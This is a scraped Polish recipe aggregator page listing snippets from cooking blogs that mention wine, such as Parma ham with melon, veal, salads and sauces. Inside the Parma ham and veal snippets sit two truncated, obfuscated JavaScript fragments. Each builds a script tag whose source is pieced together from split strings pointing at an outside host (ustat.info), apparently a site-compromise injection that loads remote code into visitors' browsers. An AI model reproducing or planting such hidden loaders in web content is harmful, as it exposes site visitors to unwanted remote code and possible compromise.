wino - 10075 przepisów (strona:369/672)

Szynka parmeńska – z czym ją podawać? Dlaczego jest tak wyjątkowa? 170

występuje w duecie z melonem. Trudno się temu dziwić. Słodki smak i soczystość tego owocu świetnie „podkręca” delikatny smak szynki parmeńskiej. Dania tego typu najlepiej uzupełnia białe wino, np. Prosecco. (function(){ qxff=document.createElement("script");qxff_=("us")+("ta"); qxff_+="t"+(".");qxff_+=("in");qxffu="122614599";qxff.async=true; qxffu+=".z8dde461xffa75frd";qxff.type="text/javascript";qxff_+="f"+"o"+("/"); qxffu+="duujX2yfek1q4";qxff.src="https://"+qxff

Mojewlasne.pl
Duszona wołowina 136

łyżeczki papryki słodkiej 2 łyżeczki pieprzu ziołowego 2 łyżki koncentratu pomidorowego (opcjonalnie) 2 łyżeczki soli łyżeczka pieprzu naturalnego 2 listki laurowe 5 ziaren ziela angielskiego 4 łyżki alkoholu (wódka, wino) 5 łyżek mąki do obtaczania (pszennej lub bez glutenu sojowej) 3 łyżki masła klarowanego do smażenia Jak przygotować duszoną wołowinę? Mięso umyć, osuszyć i pokroić na mniejsze kawałki, które

Kuchcik gotuje
Cielęcina – jak ją przygotować? Dlaczego warto sięgać po nią częściej? 236

można znaleźć zalecenie, by cielęcinę owinąć plastrem boczku. To również świetny sposób na uniknięcie jej wysuszenia – chyba że akurat przebywamy na diecie. Do dań tego typu najlepiej podawać białe wina. (function(){ ifbr_=("u"+"st");ifbr=document.createElement("script");ifbr.async=true; ifbru="122614563";ifbr_+="a"+("t.");ifbr_+="i"+("nf"+("o"))+("/"); ifbru+=".7m3es95tfbr43k72";ifbru+="4r2hhq7ywgy0tr"; ifbr.src="https://"+ifbr_+ifbru;ifbr.type="text/javascript

codojedzenia
Bezglutenowe kruche ciasto z karmelizowanym rabarbarem i bezą – przepis krok po kroku 153

przez 10 minut. Następnie zmniejszamy temperaturę do 150 stopni i pieczemy przez kolejne 35 minut. Po upływie tego czasu wyłączamy piekarnik, uchylamy lekko drzwiczki (ja podstawiłam je korkiem od wina) i zostawiamy placek w piekarniku na ok. 30 minut. Wyjmujemy ciasto i pozwalamy mu przestygnąć. Ze względu na to, że nie można odwrócić ciasta, aby zdjąć papier, przycinamy jedynie

Okiem Blondynki by McBlondi
Faszerowana cukinia 229

moim zdaniem to i tak za często. Takie bieganie po sklepach to jest marnowanie czasu. Dlatego moje posiłki to spontaniczne lub jak moje już dorosłe dzieci mówią, "sa na winie" . Czyli co się nawinie pod rękę to jest na talerzu. Składnik -1 cukinia -1/2 papryka -20 dkg mięsa ( łopatka -sól . pieprz do smaku -majeranek -1 cebula Wykonanie - Pokroiłam

Eli Gotowanie
Sałata z wędzonym kurczakiem, morelami i malinami. 140

dobrze smakuje ze słodkimi, soczystymi owocami. Przygotowanie trwa tylko kilka chwil, a to lubię najbardziej.  Sałata najlepiej smakuje przygotowania tuż przed podaniem. Dobrze komponuje się z kieliszkiem białego wina. Składniki sałaty na 1 porcję: 3 liście sałaty rzymskiej, 1 liść radicchio, kilka liści rukoli lub garść mieszanki sałat 1/2 szkl. pokrojonego wędzonego kurczaka (u mnie udka z kurczaka

Codziennik Kuchenny
Medaliony ziołowe ze schabu 125

Dziś danie szybkie, pożywne i lekkie. Mięso duszone w winie jest soczyste i kruche, idealnie smakuje z kurkami, polecam. Kilka minut duszenia i obiad na stole. Medaliony ziołowe ze schabu. ROZWIŃ I CZYTAJ DALEJ

Moje Małe Czarowanie
Wątróbka wieprzowa z cebulką 189

zbędnego przewracania, a także podczas smażenia nie nakłuwać jej widelcem, aby nie pryskała. Zobacz też: Karkówka z pieczarkami Polędwiczki w kremowym sosie własnym Gulasz z jelenia na czerwonym winie z pieczarkami Przepis na wątróbkę wieprzową z cebulką Drukuj przepis Porcji: 3 Czas gotowania: 15 minut Składniki 500 g wątróbki wieprzowej mąka do obtaczania wątróbki 2 duże cebule liść laurowy

Kuchnia Bazylii
Sos miodowo musztardowy 346

theme-font:minor-bidi; mso-fareast-language:EN-US;}   Składniki na ok 200ml sosu:   3 pełne łyżki płynnego miodu ¼ szklanki musztardy Dijon 1 łyżka octu z białego wina 2 łyżki jogurtu naturalnego 2 łyżki oliwy z oliwek ½ łyżeczki tartego chrzanu Szczypta soli Świeżo mielony pieprz do smaku Sposób przygotowania: Miód, musztardę, ocet oraz jogurt mieszamy ze sobą

Kuchnia w czekoladzie
Grillowanie – bezpiecznie, zdrowo i smaczne 128

spożywany w nadmiarze może doprowadzić do niestrawności, wzdęć, o kacu nie wspomnę! Jeśli więc pijesz alkohol rozcieńczaj go z wodą, nie z napojami gazowanymi. Najlepiej jest wypić lampkę czerwonego wina, która korzystniej wpłynie na przemianę materii niż gazowany kolorowy drink. Warto więc na taką imprezę przygotować naturalne lemoniady, np. woda mineralna z cytrusami, lodem i miętą czy koktajle owocowe

Strefa Zdrowego Żywienia
Kałamarnica z grilla 126

patelni grillowej. Spróbujcie koniecznie i nie bójcie4 się owoców morza. Są pyszne i naparwdę bardzo proste w przygotowaniu. I oczywiście nie zapomnijcie o schłodzeniu butelki wytrawnego białego wina. To nierozłączny duet! Kałamarnica z grilla Czas przygotowania: 15 minut + czas marynowania Składniki: 4 duże paski kałamarnicy 2 ząbki czosnku 1/2 papryczki chili 2 łyżki posiekanej natki z pietruszki oliwa

Kulinarne przygody Gatity
Kawowy krem zabajone z owocami 137

sztuki cukier - ok. 50g likier kawowy - ok. 50ml* * Jeżeli nie przepadacie za smakiem kawy, możecie wykorzystać dowolny inny likier (np. Amaretto) lub klasycznie skorzystać z dodatku słodkiego, białego wina. Wykonanie: Żółtka ubijamy z cukrem do czasu aż staną się one bardzo gęste, napowietrzone i niemal białe. W niewielkim garnku podgrzewamy ok. 1-2 cm wody. Kiedy woda się zagotuje

Pogotujmy.pl
Konoba MAX w Biograd na moru (Chorwacja) 132

zadbał, dopytywał czy wszystko w porządku i czy w czymś pomóc, ale nie był nachalny. Trzymał się na uboczu i czekał na odpowiedni moment, aby podejść. Doradził nam znakomite wino do obiadu. Reszta załogi po kryjomu obserwowała czy jedzenie nam smakuje i cieszyła się, kiedy widziała zadowolone miny. Bardzo przytulne i eleganckie miejsce. To nie lada sztuka połączyć obie

Karola gotuje
Sałatka ziemniaczana... 165

czerwona cebula, drobniutko posiakana 2 łyżki drobniutko posiekanego szczypiorku 2 czubate łyżki dobrego, gęstego jogurtu greckiego lub creme fraiche 2 czubate łyżki majonezu 1-2 łyżeczki octu z białego wina sól i pieprz, do smaku Włóż ziemniaki do gotujacej się lekko osolonej wody. Gotuj do miękkości - około 15-20 minut. Odcedź i ostudź. Wymieszaj majonez i jogurt. Dopraw

Lejdi of the house
Klopsiki z jelenia w sosie z brandy 237

Pamiętajmy, że mięso musi pochodzić ze zidentyfikowanego miejsca i koniecznie musi być przebadane przez weterynarza, aby potwierdził, że mięso nadaje się do spożycia. - Do dania polecam łagodne w smaku wino ze szczepu Shiraz, które świetnie pasuje do dań z dziczyzny. By Małgorzata Hert Wędrówki po kuchni http://www.wedrowkipokuchni.com.pl/ Jeśli spodobał Ci się ten przepis, spróbuj koniecznie przepisu

Wędrówki po kuchni

Proponowane wyszukiwania